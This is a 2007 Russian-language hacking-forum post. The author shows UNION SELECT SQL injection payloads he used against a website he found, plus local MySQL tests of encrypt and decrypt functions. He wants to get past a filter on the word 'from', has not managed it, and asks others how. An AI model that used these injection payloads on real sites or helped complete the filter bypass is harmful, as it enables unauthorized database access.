HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу обход фильтрации запрещённых слов в MySql
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

обход фильтрации запрещённых слов в MySql
  #1  
Старый 22.12.2007, 15:00
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами: 9976706

Репутация: 1934


Cool обход фильтрации запрещённых слов в MySql
Капался на просторах интернета и наткнулся на скул. Инъекция, как инъекция, даже ковычки не экранируются, но вот косяк, что фильтруется слово from. Ну и стал думать, как можно обойти фильтрацию. Долго не думал, потому что нечто подобное уже делали с пхп. Надо как-то зашифровать и потом расшифровать строку. Чем я и занялся. Покопался на разных ресурсах по MySQL и нашел несколько функций кодировки/декодировки строк. Начал экспериментировать. На моё удивление получилось следующее:
при подстановке
PHP код:
-1+union+select+des_encrypt(database(),'3')+/* 
выводилась строка "яcЌцI{ПџwЊ)яVeЖ…" далее подставляя
PHP код:
-1+union+select+des_decrypt('яcЌцI{ПџwЊ)яVeЖ…','3')+/* 
На экране появлялась версия дб...
Поэкпериментировав на локальном серве денвера получил следующее

PHP код:
mysqlselect aes_encrypt(version(),'12');
+-----------------------------+
aes_encrypt(version(),'12') |
+-----------------------------+
| └/Ь0⌂Ва{ў_wВ╢ьДО            |
+-----------------------------+
1 row in set (0.00 sec)

mysqlselect aes_decrypt('└/Ь0⌂Ва{ў_wВ╢ьДО','12');
+--------------------------------------+
aes_decrypt('└/Ь0⌂Ва{ў_wВ╢ьДО','12') |
+--------------------------------------+
4.1.16-max                           |
+--------------------------------------+
1 row in set (0.00 sec)

mysqlselect ENCODE(user(),'2');
+--------------------+
ENCODE(user(),'2') |
+--------------------+
рL♂3М▬Яч╣,↓Gєs     |
+--------------------+
1 row in set (0.00 sec)

mysqlselect decode('рL♂3М▬Яч╣,↓Gєs','2');
+------------------------------+
decode('рL♂3М▬Яч╣,↓Gєs','2') |
+------------------------------+
ODBC@localhost               |
+------------------------------+
1 row in set (0.00 sec)

mysql
Главное не потерять ни одного символа. Но цели я своей так и не добился, нифига пока не обошёл фильтрацию...Вот собственно вопрос: КАК?!!??! Как это можно использовать?
𝕏 Twitter Reddit Telegram Копировать ссылку
Последний раз редактировалось AFoST; 22.12.2007 в 15:58..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обход регистрации в Invision Power Board v1.3 Final DeeIP Уязвимости CMS / форумов 1 10.04.2005 20:35



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.